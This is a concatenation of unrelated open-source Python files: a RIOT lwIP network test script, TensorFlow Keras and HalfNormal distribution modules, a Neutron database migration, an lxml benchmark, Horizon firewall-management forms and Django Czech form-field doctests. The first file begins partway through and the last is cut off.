class BuildStrategy(BoardStrategy):
def execute(self, application, env=None):
super(BuildStrategy, self).__run_make(application, ("all",), env)
class FlashStrategy(BoardStrategy):
def execute(self, application, env=None):
super(FlashStrategy, self).__run_make(application, ("all",), env)
class ResetStrategy(BoardStrategy):
def execute(self, application, env=None):
super(ResetStrategy, self).__run_make(application, ("reset",), env)
class Board(object):
def __init__(self, name, port=None, serial=None, clean=None,
build=None, flash=None,
reset=None, term=None):
def _reset_native_execute(obj, application, env=None, *args, **kwargs):
pass
if (name == "native") and (reset is None):
reset = _reset_native_execute
self.name = name
self.port = port
self.serial = serial
self.clean_strategy = CleanStrategy(self, clean)
self.build_strategy = BuildStrategy(self, build)
self.flash_strategy = FlashStrategy(self, flash)
self.reset_strategy = ResetStrategy(self, reset)
def __len__(self):
return 1
def __iter__(self):
return self
def next(self):
raise StopIteration()
def __repr__(self):
return ("<Board %s,port=%s,serial=%s>" %
(repr(self.name), repr(self.port), repr(self.serial)))
def to_env(self):
env = {}
if self.name:
env['BOARD'] = self.name
if self.port:
env['PORT'] = self.port
if self.serial:
env['SERIAL'] = self.serial
return env
def clean(self, application=os.getcwd(), env=None):
self.build_strategy.execute(application, env)
def build(self, application=os.getcwd(), env=None):
self.build_strategy.execute(application, env)
def flash(self, application=os.getcwd(), env=None):
self.flash_strategy.execute(application, env)
def reset(self, application=os.getcwd(), env=None):
self.reset_strategy.execute(application, env)
class BoardGroup(object):
def __init__(self, boards):
self.boards = boards
def __len__(self):
return len(self.boards)
def __iter__(self):
return iter(self.boards)
def __repr__(self):
return str(self.boards)
def clean(self, application=os.getcwd(), env=None):
for board in self.boards:
board.clean(application, env)
def build(self, application=os.getcwd(), env=None):
for board in self.boards:
board.build(application, env)
def flash(self, application=os.getcwd(), env=None):
for board in self.boards:
board.flash(application, env)
def reset(self, application=os.getcwd(), env=None):
for board in self.boards:
board.reset(application, env)
def default_test_case(board_group, application, env=None):
for board in board_group:
env = os.environ.copy()
if env is not None:
env.update(env)
env.update(board.to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env,
timeout=DEFAULT_TIMEOUT,
logfile=sys.stdout) as spawn:
spawn.expect("TEST: SUCCESS")
class TestStrategy(ApplicationStrategy):
def execute(self, board_groups, test_cases=[default_test_case],
timeout=DEFAULT_TIMEOUT, env=None):
for board_group in board_groups:
print("Testing for %s: " % board_group)
for test_case in test_cases:
board_group.reset()
test_case(board_group, self.app_dir, env=None)
sys.stdout.write('.')
sys.stdout.flush()
print()
def get_ipv6_address(spawn):
spawn.sendline(u"ifconfig")
spawn.expect(u"[A-Za-z0-9]{2}_[0-9]+: inet6 (fe80::[0-9a-f:]+)")
return spawn.match.group(1)
def test_ipv6_send(board_group, application, env=None):
env_sender = os.environ.copy()
if env is not None:
env_sender.update(env)
env_sender.update(board_group.boards[0].to_env())
env_receiver = os.environ.copy()
if env is not None:
env_receiver.update(env)
env_receiver.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_sender,
timeout=DEFAULT_TIMEOUT) as sender, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_receiver,
timeout=DEFAULT_TIMEOUT) as receiver:
ipprot = random.randint(0x00, 0xff)
receiver_ip = get_ipv6_address(receiver)
receiver.sendline(u"ip server start %d" % ipprot)
# wait for neighbor discovery to be done
time.sleep(5)
sender.sendline(u"ip send %s %d 01:23:45:67:89:ab:cd:ef" % (receiver_ip, ipprot))
sender.expect_exact(u"Success: send 8 byte over IPv6 to %s (next header: %d)" %
(receiver_ip, ipprot))
receiver.expect(u"00000000 01 23 45 67 89 AB CD EF")
def test_udpv6_send(board_group, application, env=None):
env_sender = os.environ.copy()
if env is not None:
env_sender.update(env)
env_sender.update(board_group.boards[0].to_env())
env_receiver = os.environ.copy()
if env is not None:
env_receiver.update(env)
env_receiver.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_sender,
timeout=DEFAULT_TIMEOUT) as sender, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_receiver,
timeout=DEFAULT_TIMEOUT) as receiver:
port = random.randint(0x0000, 0xffff)
receiver_ip = get_ipv6_address(receiver)
receiver.sendline(u"udp server start %d" % port)
# wait for neighbor discovery to be done
time.sleep(5)
sender.sendline(u"udp send %s %d ab:cd:ef" % (receiver_ip, port))
sender.expect_exact(u"Success: send 3 byte over UDP to [%s]:%d" %
(receiver_ip, port))
receiver.expect(u"00000000 AB CD EF")
def test_tcpv6_send(board_group, application, env=None):
env_client = os.environ.copy()
if env is not None:
env_client.update(env)
env_client.update(board_group.boards[0].to_env())
env_server = os.environ.copy()
if env is not None:
env_server.update(env)
env_server.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_client,
timeout=DEFAULT_TIMEOUT) as client, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_server,
timeout=DEFAULT_TIMEOUT) as server:
port = random.randint(0x0000, 0xffff)
server_ip = get_ipv6_address(server)
client_ip = get_ipv6_address(client)
server.sendline(u"tcp server start %d" % port)
# wait for neighbor discovery to be done
time.sleep(5)
client.sendline(u"tcp connect %s %d" % (server_ip, port))
server.expect(u"TCP client \\[%s\\]:[0-9]+ connected" % client_ip)
client.sendline(u"tcp send affe:abe")
client.expect_exact(u"Success: send 4 byte over TCP to server")
server.expect(u"00000000 AF FE AB E0")
client.sendline(u"tcp disconnect")
client.sendline(u"tcp send affe:abe")
client.expect_exact(u"could not send")
def test_triple_send(board_group, application, env=None):
env_sender = os.environ.copy()
if env is not None:
env_sender.update(env)
env_sender.update(board_group.boards[0].to_env())
env_receiver = os.environ.copy()
if env is not None:
env_receiver.update(env)
env_receiver.update(board_group.boards[1].to_env())
with pexpect.spawnu("make", ["-C", application, "term"], env=env_sender,
timeout=DEFAULT_TIMEOUT) as sender, \
pexpect.spawnu("make", ["-C", application, "term"], env=env_receiver,
timeout=DEFAULT_TIMEOUT) as receiver:
udp_port = random.randint(0x0000, 0xffff)
tcp_port = random.randint(0x0000, 0xffff)
ipprot = random.randint(0x00, 0xff)
receiver_ip = get_ipv6_address(receiver)
sender_ip = get_ipv6_address(sender)
receiver.sendline(u"ip server start %d" % ipprot)
receiver.sendline(u"udp server start %d" % udp_port)
receiver.sendline(u"tcp server start %d" % tcp_port)
# wait for neighbor discovery to be done
time.sleep(5)
sender.sendline(u"udp send %s %d 01:23" % (receiver_ip, udp_port))
sender.expect_exact(u"Success: send 2 byte over UDP to [%s]:%d" %
(receiver_ip, udp_port))
receiver.expect(u"00000000 01 23")
sender.sendline(u"ip send %s %d 01:02:03:04" % (receiver_ip, ipprot))
sender.expect_exact(u"Success: send 4 byte over IPv6 to %s (next header: %d)" %
(receiver_ip, ipprot))
receiver.expect(u"00000000 01 02 03 04")
sender.sendline(u"tcp connect %s %d" % (receiver_ip, tcp_port))
receiver.expect(u"TCP client \\[%s\\]:[0-9]+ connected" % sender_ip)
sender.sendline(u"tcp send dead:beef")
sender.expect_exact(u"Success: send 4 byte over TCP to server")
receiver.expect(u"00000000 DE AD BE EF")
if __name__ == "__main__":
TestStrategy().execute([BoardGroup((Board("native", "tap0"),
Board("native", "tap1")))],
[test_ipv6_send, test_udpv6_send, test_tcpv6_send,
test_triple_send])
| BytesGalore/RIOT | tests/lwip/tests/01-run.py | Python | lgpl-2.1 | 11,453 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras Applications are canned architectures with pre-trained weights."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.applications import inception_v3
from tensorflow.python.keras.applications import mobilenet
from tensorflow.python.keras.applications import resnet50
from tensorflow.python.keras.applications import vgg16
from tensorflow.python.keras.applications import vgg19
from tensorflow.python.keras.applications import xception
from tensorflow.python.keras.applications.inception_v3 import InceptionV3
from tensorflow.python.keras.applications.mobilenet import MobileNet
from tensorflow.python.keras.applications.resnet50 import ResNet50
from tensorflow.python.keras.applications.vgg16 import VGG16
from tensorflow.python.keras.applications.vgg19 import VGG19
from tensorflow.python.keras.applications.xception import Xception
del absolute_import
del division
del print_function
| tornadozou/tensorflow | tensorflow/python/keras/applications/__init__.py | Python | apache-2.0 | 1,675 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Extra dhcp opts support
Revision ID: 53bbd27ec841
Revises: 40dffbf4b549
Create Date: 2013-05-09 15:36:50.485036
"""
# revision identifiers, used by Alembic.
revision = '53bbd27ec841'
down_revision = '40dffbf4b549'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = [
'neutron.plugins.openvswitch.ovs_neutron_plugin.OVSNeutronPluginV2'
]
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.create_table(
'extradhcpopts',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('port_id', sa.String(length=36), nullable=False),
sa.Column('opt_name', sa.String(length=64), nullable=False),
sa.Column('opt_value', sa.String(length=255), nullable=False),
sa.ForeignKeyConstraint(['port_id'], ['ports.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('port_id', 'opt_name', name='uidx_portid_optname'))
def downgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
### commands auto generated by Alembic - please adjust! ###
op.drop_table('extradhcpopts')
### end Alembic commands ###
| ntt-sic/neutron | neutron/db/migration/alembic_migrations/versions/53bbd27ec841_extra_dhcp_opts_supp.py | Python | apache-2.0 | 2,051 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Half Normal distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import special_math
__all__ = [
"HalfNormal",
]
class HalfNormal(distribution.Distribution):
"""The Half Normal distribution with scale `scale`.
#### Mathematical details
The half normal is a transformation of a centered normal distribution.
If some random variable `X` has normal distribution,
```none
X ~ Normal(0.0, scale)
Y = |X|
```
Then `Y` will have half normal distribution. The probability density
function (pdf) is:
```none
pdf(x; scale, x > 0) = sqrt(2) / (scale * sqrt(pi)) *
exp(- 1/2 * (x / scale) ** 2)
)
```
Where `scale = sigma` is the standard deviation of the underlying normal
distribution.
#### Examples
Examples of initialization of one or a batch of distributions.
```python
# Define a single scalar HalfNormal distribution.
dist = tf.contrib.distributions.HalfNormal(scale=3.0)
# Evaluate the cdf at 1, returning a scalar.
dist.cdf(1.)
# Define a batch of two scalar valued HalfNormals.
# The first has scale 11.0, the second 22.0
dist = tf.contrib.distributions.HalfNormal(scale=[11.0, 22.0])
# Evaluate the pdf of the first distribution on 1.0, and the second on 1.5,
# returning a length two tensor.
dist.prob([1.0, 1.5])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
"""
def __init__(self,
scale,
validate_args=False,
allow_nan_stats=True,
name="HalfNormal"):
"""Construct HalfNormals with scale `scale`.
Args:
scale: Floating point tensor; the scales of the distribution(s).
Must contain only positive values.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value "`NaN`" to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = locals()
with ops.name_scope(name, values=[scale]):
with ops.control_dependencies([check_ops.assert_positive(scale)] if
validate_args else []):
self._scale = array_ops.identity(scale, name="scale")
super(HalfNormal, self).__init__(
dtype=self._scale.dtype,
reparameterization_type=distribution.FULLY_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._scale],
name=name)
@staticmethod
def _param_shapes(sample_shape):
return {"scale": ops.convert_to_tensor(sample_shape, dtype=dtypes.int32)}
@property
def scale(self):
"""Distribution parameter for the scale."""
return self._scale
def _batch_shape_tensor(self):
return array_ops.shape(self.scale)
def _batch_shape(self):
return self.scale.shape
def _event_shape_tensor(self):
return constant_op.constant([], dtype=dtypes.int32)
def _event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
shape = array_ops.concat([[n], self.batch_shape_tensor()], 0)
sampled = random_ops.random_normal(
shape=shape, mean=0., stddev=1., dtype=self.dtype, seed=seed)
return math_ops.abs(sampled * self.scale)
def _prob(self, x):
coeff = np.sqrt(2) / self.scale / np.sqrt(np.pi)
pdf = coeff * math_ops.exp(- 0.5 * (x / self.scale) ** 2)
return pdf * math_ops.cast(x >= 0, self.dtype)
def _cdf(self, x):
truncated_x = nn.relu(x)
return math_ops.erf(truncated_x / self.scale / np.sqrt(2.0))
def _entropy(self):
return 0.5 * math_ops.log(np.pi * self.scale ** 2.0 / 2.0) + 0.5
def _mean(self):
return self.scale * np.sqrt(2.0) / np.sqrt(np.pi)
def _quantile(self, p):
return np.sqrt(2.0) * self.scale * special_math.erfinv(p)
def _mode(self):
return array_ops.zeros(self.batch_shape_tensor())
def _variance(self):
return self.scale ** 2.0 * (1.0 - 2.0 / np.pi)
| Mistobaan/tensorflow | tensorflow/contrib/distributions/python/ops/half_normal.py | Python | apache-2.0 | 5,678 |
import sys, copy
from itertools import *
import benchbase
from benchbase import (with_attributes, with_text, onlylib,
serialized, children, nochange)
############################################################
# Benchmarks
############################################################
class BenchMark(benchbase.TreeBenchMark):
repeat100 = range(100)
repeat1000 = range(1000)
repeat3000 = range(3000)
def __init__(self, lib):
from lxml import etree, objectify
self.objectify = objectify
parser = etree.XMLParser(remove_blank_text=True)
lookup = objectify.ObjectifyElementClassLookup()
parser.setElementClassLookup(lookup)
super(BenchMark, self).__init__(etree, parser)
@nochange
def bench_attribute(self, root):
"1 2 4"
for i in self.repeat3000:
root.zzzzz
def bench_attribute_assign_int(self, root):
"1 2 4"
for i in self.repeat3000:
root.XYZ = 5
def bench_attribute_assign_string(self, root):
"1 2 4"
for i in self.repeat3000:
root.XYZ = "5"
@nochange
def bench_attribute_cached(self, root):
"1 2 4"
cache = root.zzzzz
for i in self.repeat3000:
root.zzzzz
@nochange
def bench_attributes_deep(self, root):
"1 2 4"
for i in self.repeat3000:
root.zzzzz['{cdefg}a00001']
@nochange
def bench_attributes_deep_cached(self, root):
"1 2 4"
cache1 = root.zzzzz
cache2 = cache1['{cdefg}a00001']
for i in self.repeat3000:
root.zzzzz['{cdefg}a00001']
@nochange
def bench_objectpath(self, root):
"1 2 4"
path = self.objectify.ObjectPath(".zzzzz")
for i in self.repeat3000:
path(root)
@nochange
def bench_objectpath_deep(self, root):
"1 2 4"
path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
for i in self.repeat3000:
path(root)
@nochange
def bench_objectpath_deep_cached(self, root):
"1 2 4"
cache1 = root.zzzzz
cache2 = cache1['{cdefg}a00001']
path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
for i in self.repeat3000:
path(root)
@with_text(text=True, utext=True, no_text=True)
def bench_annotate(self, root):
self.objectify.annotate(root)
@nochange
def bench_descendantpaths(self, root):
root.descendantpaths()
@nochange
@with_text(text=True)
def bench_type_inference(self, root):
"1 2 4"
el = root.aaaaa
for i in self.repeat1000:
el.getchildren()
@nochange
@with_text(text=True)
def bench_type_inference_annotated(self, root):
"1 2 4"
el = root.aaaaa
self.objectify.annotate(el)
for i in self.repeat1000:
el.getchildren()
@nochange
@children
def bench_elementmaker(self, children):
E = self.objectify.E
for child in children:
root = E.this(
"test",
E.will(
E.do("nothing"),
E.special,
)
)
if __name__ == '__main__':
benchbase.main(BenchMark)
| mhnatiuk/phd_sociology_of_religion | scrapper/build/lxml/benchmark/bench_objectify.py | Python | gpl-2.0 | 3,322 |
# Copyright 2013, Big Switch Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils import validators
from openstack_dashboard import api
port_validator = validators.validate_port_or_colon_separated_port_range
LOG = logging.getLogger(__name__)
class UpdateRule(forms.SelfHandlingForm):
name = forms.CharField(max_length=80, label=_("Name"), required=False)
description = forms.CharField(
required=False,
max_length=80, label=_("Description"))
protocol = forms.ChoiceField(
label=_("Protocol"), required=False,
choices=[('TCP', _('TCP')), ('UDP', _('UDP')), ('ICMP', _('ICMP')),
('ANY', _('ANY'))],
help_text=_('Protocol for the firewall rule'))
action = forms.ChoiceField(
label=_("Action"), required=False,
choices=[('ALLOW', _('ALLOW')), ('DENY', _('DENY'))],
help_text=_('Action for the firewall rule'))
source_ip_address = forms.IPField(
label=_("Source IP Address/Subnet"),
version=forms.IPv4 | forms.IPv6,
required=False, mask=True,
help_text=_('Source IP address or subnet'))
destination_ip_address = forms.IPField(
label=_('Destination IP Address/Subnet'),
version=forms.IPv4 | forms.IPv6,
required=False, mask=True,
help_text=_('Destination IP address or subnet'))
source_port = forms.CharField(
max_length=80,
label=_("Source Port/Port Range"),
required=False,
validators=[port_validator],
help_text=_('Source port (integer in [1, 65535] or range in a:b)'))
destination_port = forms.CharField(
max_length=80,
label=_("Destination Port/Port Range"),
required=False,
validators=[port_validator],
help_text=_('Destination port (integer in [1, 65535] or range'
' in a:b)'))
shared = forms.BooleanField(label=_("Shared"), required=False)
enabled = forms.BooleanField(label=_("Enabled"), required=False)
failure_url = 'horizon:project:firewalls:index'
def handle(self, request, context):
rule_id = self.initial['rule_id']
name_or_id = context.get('name') or rule_id
if context['protocol'] == 'ANY':
context['protocol'] = None
for f in ['source_ip_address', 'destination_ip_address',
'source_port', 'destination_port']:
if not context[f]:
context[f] = None
try:
rule = api.fwaas.rule_update(request, rule_id, **context)
msg = _('Rule %s was successfully updated.') % name_or_id
LOG.debug(msg)
messages.success(request, msg)
return rule
except Exception as e:
msg = (_('Failed to update rule %(name)s: %(reason)s') %
{'name': name_or_id, 'reason': e})
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class UpdatePolicy(forms.SelfHandlingForm):
name = forms.CharField(max_length=80, label=_("Name"), required=False)
description = forms.CharField(required=False,
max_length=80, label=_("Description"))
shared = forms.BooleanField(label=_("Shared"), required=False)
audited = forms.BooleanField(label=_("Audited"), required=False)
failure_url = 'horizon:project:firewalls:index'
def handle(self, request, context):
policy_id = self.initial['policy_id']
name_or_id = context.get('name') or policy_id
try:
policy = api.fwaas.policy_update(request, policy_id, **context)
msg = _('Policy %s was successfully updated.') % name_or_id
LOG.debug(msg)
messages.success(request, msg)
return policy
except Exception as e:
msg = _('Failed to update policy %(name)s: %(reason)s') % {
'name': name_or_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class UpdateFirewall(forms.SelfHandlingForm):
name = forms.CharField(max_length=80,
label=_("Name"),
required=False)
description = forms.CharField(max_length=80,
label=_("Description"),
required=False)
firewall_policy_id = forms.ChoiceField(label=_("Policy"))
admin_state_up = forms.ChoiceField(choices=[(True, _('UP')),
(False, _('DOWN'))],
label=_("Admin State"))
failure_url = 'horizon:project:firewalls:index'
def __init__(self, request, *args, **kwargs):
super(UpdateFirewall, self).__init__(request, *args, **kwargs)
try:
tenant_id = self.request.user.tenant_id
policies = api.fwaas.policy_list_for_tenant(request, tenant_id)
policies = sorted(policies, key=lambda policy: policy.name)
except Exception:
exceptions.handle(request,
_('Unable to retrieve policy list.'))
policies = []
policy_id = kwargs['initial']['firewall_policy_id']
policy_name = [p.name for p in policies if p.id == policy_id][0]
firewall_policy_id_choices = [(policy_id, policy_name)]
for p in policies:
if p.id != policy_id:
firewall_policy_id_choices.append((p.id, p.name_or_id))
self.fields['firewall_policy_id'].choices = firewall_policy_id_choices
def handle(self, request, context):
firewall_id = self.initial['firewall_id']
name_or_id = context.get('name') or firewall_id
context['admin_state_up'] = (context['admin_state_up'] == 'True')
try:
firewall = api.fwaas.firewall_update(request, firewall_id,
**context)
msg = _('Firewall %s was successfully updated.') % name_or_id
LOG.debug(msg)
messages.success(request, msg)
return firewall
except Exception as e:
msg = _('Failed to update firewall %(name)s: %(reason)s') % {
'name': name_or_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class InsertRuleToPolicy(forms.SelfHandlingForm):
firewall_rule_id = forms.ChoiceField(label=_("Insert Rule"))
insert_before = forms.ChoiceField(label=_("Before"),
required=False)
insert_after = forms.ChoiceField(label=_("After"),
required=False)
failure_url = 'horizon:project:firewalls:index'
def __init__(self, request, *args, **kwargs):
super(InsertRuleToPolicy, self).__init__(request, *args, **kwargs)
try:
tenant_id = self.request.user.tenant_id
all_rules = api.fwaas.rule_list_for_tenant(request, tenant_id)
all_rules = sorted(all_rules, key=lambda rule: rule.name_or_id)
available_rules = [r for r in all_rules
if not r.firewall_policy_id]
current_rules = []
for r in kwargs['initial']['firewall_rules']:
r_obj = [rule for rule in all_rules if r == rule.id][0]
current_rules.append(r_obj)
available_choices = [(r.id, r.name_or_id) for r in available_rules]
current_choices = [(r.id, r.name_or_id) for r in current_rules]
except Exception as e:
msg = _('Failed to retrieve available rules: %s') % e
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
self.fields['firewall_rule_id'].choices = available_choices
self.fields['insert_before'].choices = [('', '')] + current_choices
self.fields['insert_after'].choices = [('', '')] + current_choices
def handle(self, request, context):
policy_id = self.initial['policy_id']
policy_name_or_id = self.initial['name'] or policy_id
try:
insert_rule_id = context['firewall_rule_id']
insert_rule = api.fwaas.rule_get(request, insert_rule_id)
body = {'firewall_rule_id': insert_rule_id,
'insert_before': context['insert_before'],
'insert_after': context['insert_after']}
policy = api.fwaas.policy_insert_rule(request, policy_id, **body)
msg = _('Rule %(rule)s was successfully inserted to policy '
'%(policy)s.') % {
'rule': insert_rule.name or insert_rule.id,
'policy': policy_name_or_id}
LOG.debug(msg)
messages.success(request, msg)
return policy
except Exception as e:
msg = _('Failed to insert rule to policy %(name)s: %(reason)s') % {
'name': policy_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class RemoveRuleFromPolicy(forms.SelfHandlingForm):
firewall_rule_id = forms.ChoiceField(label=_("Remove Rule"))
failure_url = 'horizon:project:firewalls:index'
def __init__(self, request, *args, **kwargs):
super(RemoveRuleFromPolicy, self).__init__(request, *args, **kwargs)
try:
tenant_id = request.user.tenant_id
all_rules = api.fwaas.rule_list_for_tenant(request, tenant_id)
current_rules = []
for r in kwargs['initial']['firewall_rules']:
r_obj = [rule for rule in all_rules if r == rule.id][0]
current_rules.append(r_obj)
current_choices = [(r.id, r.name_or_id) for r in current_rules]
except Exception as e:
msg = _('Failed to retrieve current rules in policy %(name)s: '
'%(reason)s') % {'name': self.initial['name'], 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
self.fields['firewall_rule_id'].choices = current_choices
def handle(self, request, context):
policy_id = self.initial['policy_id']
policy_name_or_id = self.initial['name'] or policy_id
try:
remove_rule_id = context['firewall_rule_id']
remove_rule = api.fwaas.rule_get(request, remove_rule_id)
body = {'firewall_rule_id': remove_rule_id}
policy = api.fwaas.policy_remove_rule(request, policy_id, **body)
msg = _('Rule %(rule)s was successfully removed from policy '
'%(policy)s.') % {
'rule': remove_rule.name or remove_rule.id,
'policy': policy_name_or_id}
LOG.debug(msg)
messages.success(request, msg)
return policy
except Exception as e:
msg = _('Failed to remove rule from policy %(name)s: '
'%(reason)s') % {'name': self.initial['name'],
'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class RouterInsertionFormBase(forms.SelfHandlingForm):
def __init__(self, request, *args, **kwargs):
super(RouterInsertionFormBase, self).__init__(request, *args, **kwargs)
try:
router_choices = self.get_router_choices(request, kwargs)
self.fields['router_ids'].choices = router_choices
except Exception as e:
msg = self.init_failure_msg % {'name': self.initial['name'],
'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
@abc.abstractmethod
def get_router_choices(self, request, kwargs):
"""Return a list of selectable routers."""
@abc.abstractmethod
def get_new_router_ids(self, context):
"""Return a new list of router IDs associated with the firewall."""
def handle(self, request, context):
firewall_id = self.initial['firewall_id']
firewall_name_or_id = self.initial['name'] or firewall_id
try:
body = {'router_ids': self.get_new_router_ids(context)}
firewall = api.fwaas.firewall_update(request, firewall_id, **body)
msg = self.success_msg % {'firewall': firewall_name_or_id}
LOG.debug(msg)
messages.success(request, msg)
return firewall
except Exception as e:
msg = self.failure_msg % {'name': firewall_name_or_id, 'reason': e}
LOG.error(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
class AddRouterToFirewall(RouterInsertionFormBase):
router_ids = forms.MultipleChoiceField(
label=_("Add Routers"),
required=False,
widget=forms.CheckboxSelectMultiple(),
help_text=_("Add selected router(s) to the firewall."))
failure_url = 'horizon:project:firewalls:index'
success_msg = _('Router(s) was/were successfully added to firewall '
'%(firewall)s.')
failure_msg = _('Failed to add router(s) to firewall %(name)s: %(reason)s')
init_failure_msg = _('Failed to retrieve available routers: %(reason)s')
def get_router_choices(self, request, kwargs):
tenant_id = self.request.user.tenant_id
routers_list = api.fwaas.firewall_unassociated_routers_list(
request, tenant_id)
return [(r.id, r.name_or_id) for r in routers_list]
def get_new_router_ids(self, context):
existing_router_ids = self.initial['router_ids']
add_router_ids = context['router_ids']
return add_router_ids + existing_router_ids
class RemoveRouterFromFirewall(RouterInsertionFormBase):
router_ids = forms.MultipleChoiceField(
label=_("Remove Routers"),
required=False,
widget=forms.CheckboxSelectMultiple(),
help_text=_("Unselect the router(s) to be removed from firewall."))
failure_url = 'horizon:project:firewalls:index'
success_msg = _('Router(s) was successfully removed from firewall '
'%(firewall)s.')
failure_msg = _('Failed to remove router(s) from firewall %(name)s: '
'%(reason)s')
init_failure_msg = _('Failed to retrieve current routers in firewall '
'%(name)s: %(reason)s')
def get_router_choices(self, request, kwargs):
tenant_id = self.request.user.tenant_id
all_routers = api.neutron.router_list(request, tenant_id=tenant_id)
current_routers = [r for r in all_routers
if r['id'] in kwargs['initial']['router_ids']]
return [(r.id, r.name_or_id) for r in current_routers]
def get_new_router_ids(self, context):
# context[router_ids] is router IDs to be kept.
return context['router_ids']
| wangxiangyu/horizon | openstack_dashboard/dashboards/project/firewalls/forms.py | Python | apache-2.0 | 16,187 |
# -*- coding: utf-8 -*-
# Tests for the contrib/localflavor/ CZ Form Fields
tests = r"""
# CZPostalCodeField #########################################################
>>> from django.contrib.localflavor.cz.forms import CZPostalCodeField
>>> f = CZPostalCodeField()
>>> f.clean('84545x')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
>>> f.clean('91909')
u'91909'
>>> f.clean('917 01')
u'91701'
>>> f.clean('12345')
u'12345'
>>> f.clean('123456')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
>>> f.clean('1234')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
>>> f.clean('123 4')
Traceback (most recent call last):
...
ValidationError: [u'Enter a postal code in the format XXXXX or XXX XX.']
# CZRegionSelect ############################################################
>>> from django.contrib.localflavor.cz.forms import CZRegionSelect
>>> w = CZRegionSelect()
>>> w.render('regions', 'TT')
